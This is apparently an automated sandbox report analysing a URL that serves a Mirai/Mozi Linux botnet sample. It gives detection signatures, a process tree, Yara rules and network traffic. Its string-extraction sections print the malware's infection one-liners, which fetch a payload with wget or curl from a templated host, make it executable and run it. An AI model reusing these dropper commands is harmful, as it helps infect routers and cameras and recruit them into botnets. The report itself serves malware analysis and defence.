Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
http://112.31.189.32:40158

Overview

General Information

Sample URL:http://112.31.189.32:40158
Analysis ID:1578347
Infos:

Detection

Mirai
Score:96
Range:0 - 100
Whitelisted:false

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Creates hidden files and/or directories
Creates hidden files without content (potentially used as a mutex)
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Queries the installed Ubuntu/CentOS release
Reads the 'hosts' file potentially containing internal network hosts
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Yara signature match

Classification

General Information

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1578347
Start date and time:2024-12-19 15:46:28 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 29s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:browseurl.jbs
Sample URL:http://112.31.189.32:40158
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal96.troj.lin@0/44@31/0

Warnings

  • Excluded IPs from analysis (whitelisted): 34.120.208.123, 35.244.181.201
  • Excluded domains from analysis (whitelisted): incoming.telemetry.mozilla.org, aus5.mozilla.org
  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • VT rate limit hit for: http://112.31.189.32:40158

Process Tree

  • system is lnxubuntu20
  • exo-open (PID: 6239, Parent: 6226, MD5: 60a307a6a6325e2034eb5cc56bff1abd) Arguments: exo-open http://112.31.189.32:40158
    • exo-open New Fork (PID: 6242, Parent: 6239)
      • exo-open New Fork (PID: 6243, Parent: 6242)
      • exo-helper-2 (PID: 6243, Parent: 1860, MD5: ab59c8990baa7254463cdf800a83b9e3) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/exo-2/exo-helper-2 --launch WebBrowser http://112.31.189.32:40158
        • sensible-browser (PID: 6244, Parent: 6243, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/bin/sensible-browser http://112.31.189.32:40158
          • which (PID: 6245, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: which sensible-browser
        • x-www-browser (PID: 6244, Parent: 6243, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/bin/x-www-browser http://112.31.189.32:40158
          • which (PID: 6246, Parent: 6244, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: which /usr/bin/x-www-browser
        • firefox (PID: 6244, Parent: 6243, MD5: bf9680bcd223dba6b6e38b63bc4f73d7) Arguments: /usr/lib/firefox/firefox http://112.31.189.32:40158
          • firefox New Fork (PID: 6248, Parent: 6244)
          • firefox New Fork (PID: 6249, Parent: 6244)
          • firefox New Fork (PID: 6267, Parent: 6244)
          • lsb_release (PID: 6267, Parent: 6244, MD5: 69f442c3e33b5f9a66b722c29ad89435) Arguments: /usr/bin/lsb_release -idrc
          • firefox New Fork (PID: 6290, Parent: 6244)
          • dbus-launch (PID: 6290, Parent: 6244, MD5: 0b22a45154a51c6121bb1d208d8ab203) Arguments: dbus-launch --autolaunch=ee49dfd4fa47433baee88884e2d7de7c --binary-syntax --close-stderr
          • firefox New Fork (PID: 6302, Parent: 6244)
            • firefox New Fork (PID: 6303, Parent: 6302)
          • firefox (PID: 6302, Parent: 6244, MD5: bf9680bcd223dba6b6e38b63bc4f73d7) Arguments: /usr/lib/firefox/firefox -contentproc -parentBuildID 20210816143654 -prefsLen 1 -prefMapSize 238647 -appdir /usr/lib/firefox/browser 6244 true socket
          • firefox New Fork (PID: 6332, Parent: 6244)
            • firefox New Fork (PID: 6334, Parent: 6332)
          • firefox (PID: 6332, Parent: 6244, MD5: bf9680bcd223dba6b6e38b63bc4f73d7) Arguments: /usr/lib/firefox/firefox -contentproc -childID 1 -isForBrowser -prefsLen 188 -prefMapSize 238647 -jsInit 285716 -parentBuildID 20210816143654 -appdir /usr/lib/firefox/browser 6244 true tab
          • firefox New Fork (PID: 6390, Parent: 6244)
            • firefox New Fork (PID: 6392, Parent: 6390)
          • firefox (PID: 6390, Parent: 6244, MD5: bf9680bcd223dba6b6e38b63bc4f73d7) Arguments: /usr/lib/firefox/firefox -contentproc -childID 2 -isForBrowser -prefsLen 5911 -prefMapSize 238647 -jsInit 285716 -parentBuildID 20210816143654 -appdir /usr/lib/firefox/browser 6244 true tab
          • firefox New Fork (PID: 6451, Parent: 6244)
            • firefox New Fork (PID: 6454, Parent: 6451)
          • firefox (PID: 6451, Parent: 6244, MD5: bf9680bcd223dba6b6e38b63bc4f73d7) Arguments: /usr/lib/firefox/firefox -contentproc -childID 3 -isForBrowser -prefsLen 5982 -prefMapSize 238647 -jsInit 285716 -parentBuildID 20210816143654 -appdir /usr/lib/firefox/browser 6244 true tab
  • dash New Fork (PID: 6424, Parent: 4332)
  • rm (PID: 6424, Parent: 4332, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.NpJKnMbh7N /tmp/tmp.MA5wR8QSVd /tmp/tmp.zw1IYTG03i
  • dash New Fork (PID: 6425, Parent: 4332)
  • rm (PID: 6425, Parent: 4332, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.NpJKnMbh7N /tmp/tmp.MA5wR8QSVd /tmp/tmp.zw1IYTG03i
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapLinux_Trojan_Mirai_5c62e6b2unknownunknown
  • 0x417c1:$a: FF C1 83 F9 05 7F 14 48 63 C1 48 89 94 C4 00 01 00 00 FF C6 48
dump.pcapLinux_Trojan_Mirai_77137320unknownunknown
  • 0x417a8:$a: 54 24 01 89 C7 31 F6 31 C9 48 89 A4 24 00 01 00 00 EB 1D 80 7A
dump.pcapLinux_Trojan_Mirai_ac253e4funknownunknown
  • 0x41666:$a: 00 31 C9 EB 0A 6B C1 0A 0F BE D2 8D 4C 02 D0 8A 17 48 FF C7 8D

Dropped Files

SourceRuleDescriptionAuthorStrings
/tmp/mgmP_SRg.zip.partJoeSecurity_Mirai_4Yara detected MiraiJoe Security
    /tmp/mgmP_SRg.zip.partJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      /tmp/mgmP_SRg.zip.partJoeSecurity_Mirai_6Yara detected MiraiJoe Security
        /tmp/mgmP_SRg.zip.partJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          /tmp/mgmP_SRg.zip.partLinux_Trojan_Mirai_5c62e6b2unknownunknown
          • 0x3850e:$a: FF C1 83 F9 05 7F 14 48 63 C1 48 89 94 C4 00 01 00 00 FF C6 48
          Click to see the 2 entries

          Suricata Signatures

          No Suricata rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for dropped file
          Source: /tmp/mgmP_SRg.zip.partAvira: detection malicious, Label: EXP/ELF.Mirai.O
          Source: mgmP_SRg.zip.part.42.drString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
          Source: mgmP_SRg.zip.part.42.drString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
          Source: mgmP_SRg.zip.part.42.drString: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'

          Networking

          barindex
          Connects to many ports of the same IP (likely port scanning)
          Source: global trafficTCP traffic: 112.31.189.32 ports 40158,0,1,4,5,8
          Uses known network protocols on non-standard ports
          Source: unknownNetwork traffic detected: HTTP traffic on port 39236 -> 40158
          Source: unknownNetwork traffic detected: HTTP traffic on port 40158 -> 39236
          Source: /usr/lib/firefox/firefox (PID: 6244)Reads hosts file: /etc/hostsJump to behavior
          Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
          Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
          Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: unknownTCP traffic detected without corresponding DNS query: 112.31.189.32
          Source: global trafficHTTP traffic detected: GET /chains/remote-settings.content-signature.mozilla.org-2021-09-19-15-17-11.chain HTTP/1.1Host: content-signature-2.cdn.mozilla.netUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteIf-Modified-Since: Sat, 31 Jul 2021 15:17:12 GMTIf-None-Match: "8cfd2c8fe1fb0bc900759661d7a6ee89"
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: push.services.mozilla.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brSec-WebSocket-Version: 13Origin: wss://push.services.mozilla.com/Sec-WebSocket-Protocol: push-notificationSec-WebSocket-Extensions: permessage-deflateSec-WebSocket-Key: 7Q9OGruJUnklmGBDXI/O1Q==Connection: keep-alive, UpgradeSec-Fetch-Dest: websocketSec-Fetch-Mode: websocketSec-Fetch-Site: cross-sitePragma: no-cacheCache-Control: no-cacheUpgrade: websocket
          Source: global trafficHTTP traffic detected: GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/jsonConnection: keep-aliveSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteIf-Modified-Since: Tue, 01 Jun 2021 14:28:23 GMTIf-None-Match: "1622557703112"
          Source: global trafficHTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-site
          Source: global trafficHTTP traffic detected: GET /main-workspace/ms-language-packs/b8aa99dd-b2b6-4312-8c40-d15867393b13.ftl HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-site
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: push.services.mozilla.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brSec-WebSocket-Version: 13Origin: wss://push.services.mozilla.com/Sec-WebSocket-Protocol: push-notificationSec-WebSocket-Extensions: permessage-deflateSec-WebSocket-Key: /0LgGlndYTgjJs7cCfzo7w==Connection: keep-alive, UpgradeSec-Fetch-Dest: websocketSec-Fetch-Mode: websocketSec-Fetch-Site: cross-sitePragma: no-cacheCache-Control: no-cacheUpgrade: websocket
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: push.services.mozilla.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brSec-WebSocket-Version: 13Origin: wss://push.services.mozilla.com/Sec-WebSocket-Protocol: push-notificationSec-WebSocket-Extensions: permessage-deflateSec-WebSocket-Key: fQiWJAQULmuneWRLRNpnZQ==Connection: keep-alive, UpgradeSec-Fetch-Dest: websocketSec-Fetch-Mode: websocketSec-Fetch-Site: cross-sitePragma: no-cacheCache-Control: no-cacheUpgrade: websocket
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: push.services.mozilla.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brSec-WebSocket-Version: 13Origin: wss://push.services.mozilla.com/Sec-WebSocket-Protocol: push-notificationSec-WebSocket-Extensions: permessage-deflateSec-WebSocket-Key: D6Qtnz1/2OalTnfSugU/oA==Connection: keep-alive, UpgradeSec-Fetch-Dest: websocketSec-Fetch-Mode: websocketSec-Fetch-Site: cross-sitePragma: no-cacheCache-Control: no-cacheUpgrade: websocket
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 112.31.189.32:40158User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveUpgrade-Insecure-Requests: 1
          Source: global trafficDNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
          Source: global trafficDNS traffic detected: DNS query: push.services.mozilla.com
          Source: global trafficDNS traffic detected: DNS query: firefox.settings.services.mozilla.com
          Source: global trafficDNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
          Source: global trafficDNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
          Source: global trafficDNS traffic detected: DNS query: firefox-settings-attachments.cdn.mozilla.net
          Source: global trafficDNS traffic detected: DNS query: attachments.prod.remote-settings.prod.webservices.mozgcp.net
          Source: global trafficDNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
          Source: global trafficDNS traffic detected: DNS query: www.wikipedia.org
          Source: global trafficDNS traffic detected: DNS query: www.example.com
          Source: global trafficDNS traffic detected: DNS query: www.youtube.com
          Source: global trafficDNS traffic detected: DNS query: www.facebook.com
          Source: global trafficDNS traffic detected: DNS query: www.reddit.com
          Source: global trafficDNS traffic detected: DNS query: twitter.com
          Source: global trafficDNS traffic detected: DNS query: reddit.map.fastly.net
          Source: mgmP_SRg.zip.part.42.drString found in binary or memory: http://%s:%d/Mozi.a;chmod
          Source: mgmP_SRg.zip.part.42.drString found in binary or memory: http://%s:%d/Mozi.a;sh$
          Source: mgmP_SRg.zip.part.42.drString found in binary or memory: http://%s:%d/Mozi.m
          Source: mgmP_SRg.zip.part.42.drString found in binary or memory: http://%s:%d/Mozi.m;
          Source: mgmP_SRg.zip.part.42.drString found in binary or memory: http://%s:%d/Mozi.m;$
          Source: mgmP_SRg.zip.part.42.drString found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
          Source: mgmP_SRg.zip.part.42.drString found in binary or memory: http://%s:%d/bin.sh
          Source: mgmP_SRg.zip.part.42.drString found in binary or memory: http://%s:%d/bin.sh;chmod
          Source: D761C4E3CD44B794FCD52C88CEC268E12BE3D053.42.drString found in binary or memory: http://112.31.189.32:40158/
          Source: D761C4E3CD44B794FCD52C88CEC268E12BE3D053.42.drString found in binary or memory: http://112.31.189.32:40158/predictor::seen1
          Source: mgmP_SRg.zip.part.42.drString found in binary or memory: http://127.0.0.1
          Source: mgmP_SRg.zip.part.42.drString found in binary or memory: http://127.0.0.1sendcmd
          Source: mgmP_SRg.zip.part.42.drString found in binary or memory: http://HTTP/1.1
          Source: mgmP_SRg.zip.part.42.drString found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
          Source: cert9.db-journal.42.dr, cert9.db.42.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: cert9.db-journal.42.dr, cert9.db.42.drString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
          Source: cert9.db-journal.42.dr, cert9.db.42.drString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
          Source: cert9.db-journal.42.dr, cert9.db.42.drString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
          Source: cert9.db-journal.42.dr, cert9.db.42.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: cert9.db-journal.42.dr, cert9.db.42.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
          Source: cert9.db-journal.42.dr, cert9.db.42.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: cert9.db-journal.42.dr, cert9.db.42.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
          Source: cert9.db-journal.42.dr, cert9.db.42.drString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
          Source: mgmP_SRg.zip.part.42.drString found in binary or memory: http://ipinfo.io/ip
          Source: scriptCache-new.bin.42.drString found in binary or memory: http://json-schema.org/draft-04/schema#
          Source: F8CBD54DDA10F4286A41EC6A537240712D6C2308.42.drString found in binary or memory: http://kinto.readthedocs.io/en/latest/tutorials/synchronisation.html#polling-for-remote-changes
          Source: asrouter.ftl.tmp.42.dr, 37373F56CBD822F5FCF64BA01E1320A0924D8460.42.drString found in binary or memory: http://mozilla.org/MPL/2.0/.
          Source: cert9.db.42.drString found in binary or memory: http://ocsp.digicert.com0
          Source: cert9.db-journal.42.dr, cert9.db.42.drString found in binary or memory: http://ocsp.digicert.com0K
          Source: cert9.db-journal.42.dr, cert9.db.42.drString found in binary or memory: http://ocsp.pki.goog/gsr202
          Source: cert9.db-journal.42.dr, cert9.db.42.drString found in binary or memory: http://ocsp.pki.goog/gtsr100
          Source: cert9.db-journal.42.dr, cert9.db.42.drString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
          Source: cert9.db-journal.42.dr, cert9.db.42.drString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
          Source: mgmP_SRg.zip.part.42.drString found in binary or memory: http://purenetworks.com/HNAP1/
          Source: mgmP_SRg.zip.part.42.drString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: mgmP_SRg.zip.part.42.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
          Source: mgmP_SRg.zip.part.42.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
          Source: scriptCache-new.bin.42.drString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
          Source: scriptCache-new.bin.42.drString found in binary or memory: http://www.mozilla.org/newlayout/xml/parsererror.xml
          Source: cert9.db-journal.42.dr, cert9.db.42.drString found in binary or memory: http://x1.c.lencr.org/0
          Source: cert9.db-journal.42.dr, cert9.db.42.drString found in binary or memory: http://x1.i.lencr.org/0
          Source: scriptCache-new.bin.42.drString found in binary or memory: https://amazon.com
          Source: scriptCache-new.bin.42.drString found in binary or memory: https://baidu.com
          Source: scriptCache-new.bin.42.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
          Source: scriptCache-new.bin.42.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=921157
          Source: 5FFD69415953BE9CE9C07B2E9C26DA959ADEA6CB.42.drString found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
          Source: scriptCache-new.bin.42.drString found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
          Source: scriptCache-new.bin.42.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/JavaScript_OS.File/OS.File.Info#Cross-platform_Attributes
          Source: 3870112724rsegmnoittet-es.sqlite.42.dr, 3870112724rsegmnoittet-es.sqlite-wal.42.drString found in binary or memory: https://doh.xfinity.com/dns-query
          Source: scriptCache-new.bin.42.drString found in binary or memory: https://duckduckgo.com
          Source: scriptCache-new.bin.42.drString found in binary or memory: https://ebay.com
          Source: F8CBD54DDA10F4286A41EC6A537240712D6C2308.42.drString found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/
          Source: 37373F56CBD822F5FCF64BA01E1320A0924D8460.42.drString found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-language-packs/b8aa99dd-b2b6-
          Source: 3870112724rsegmnoittet-es.sqlite.42.dr, 3870112724rsegmnoittet-es.sqlite-wal.42.drString found in binary or memory: https://firefox.dns.next
          Source: scriptCache-new.bin.42.drString found in binary or memory: https://firefox.dns.nextdns.io/
          Source: scriptCache-new.bin.42.drString found in binary or memory: https://firefox.settings.services.mozilla.com/v1
          Source: F8CBD54DDA10F4286A41EC6A537240712D6C2308.42.drString found in binary or memory: https://firefox.settings.services.mozilla.com/v1/
          Source: scriptCache-new.bin.42.drString found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
          Source: 254256B27E0C48CF9B80B695F0B3B8CA84610495.42.drString found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/
          Source: scriptCache-new.bin.42.drString found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
          Source: F8CBD54DDA10F4286A41EC6A537240712D6C2308.42.drString found in binary or memory: https://github.com/Kinto/kinto-attachment/
          Source: scriptCache-new.bin.42.drString found in binary or memory: https://google.com
          Source: scriptCache-new.bin.42.drString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/7dafd5f51c0afd1ae627bb4762ac0c140a6cd5f5
          Source: BA0169DDECC481CDEEE92B48E23FCE9FD28E8595.42.drString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/deletion-request/1/4ee394c6-d4cd-43bd-
          Source: 3870112724rsegmnoittet-es.sqlite.42.dr, 3870112724rsegmnoittet-es.sqlite-wal.42.drString found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
          Source: cert9.db-journal.42.dr, cert9.db.42.drString found in binary or memory: https://pki.goog/repository/0
          Source: 3870112724rsegmnoittet-es.sqlite.42.dr, 3870112724rsegmnoittet-es.sqlite-wal.42.drString found in binary or memory: https://private.canadianshield.cira.ca/dns-query
          Source: scriptCache-new.bin.42.drString found in binary or memory: https://profiler.firefox.com
          Source: F8CBD54DDA10F4286A41EC6A537240712D6C2308.42.drString found in binary or memory: https://remote-settings.readthedocs.io
          Source: scriptCache-new.bin.42.drString found in binary or memory: https://settings.stage.mozaws.net/v1/buckets/main-preview/collections/search-config/records
          Source: scriptCache-new.bin.42.drString found in binary or memory: https://settings.stage.mozaws.net/v1/buckets/main/collections/search-config/records
          Source: scriptCache-new.bin.42.drString found in binary or memory: https://support.mozilla.org/kb/
          Source: scriptCache-new.bin.42.drString found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-help
          Source: scriptCache-new.bin.42.drString found in binary or memory: https://support.mozilla.org/kb/flash-protected-mode-autodisabled
          Source: scriptCache-new.bin.42.drString found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
          Source: scriptCache-new.bin.42.drString found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
          Source: scriptCache-new.bin.42.drString found in binary or memory: https://trr.dns.nextdns.io/
          Source: scriptCache-new.bin.42.drString found in binary or memory: https://twitter.com
          Source: cert9.db-journal.42.dr, cert9.db.42.drString found in binary or memory: https://www.digicert.com/CPS0
          Source: scriptCache-new.bin.42.drString found in binary or memory: https://www.google.com/policies/privacy/
          Source: scriptCache-new.bin.42.drString found in binary or memory: https://www.mozilla.org/firefox/new/
          Source: scriptCache-new.bin.42.drString found in binary or memory: https://www.openh264.org/
          Source: scriptCache-new.bin.42.drString found in binary or memory: https://www.widevine.com/
          Source: scriptCache-new.bin.42.drString found in binary or memory: https://yandex.com
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38694
          Source: unknownNetwork traffic detected: HTTP traffic on port 33606 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40906
          Source: unknownNetwork traffic detected: HTTP traffic on port 40896 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36554
          Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36558 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36554 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 40912 -> 443
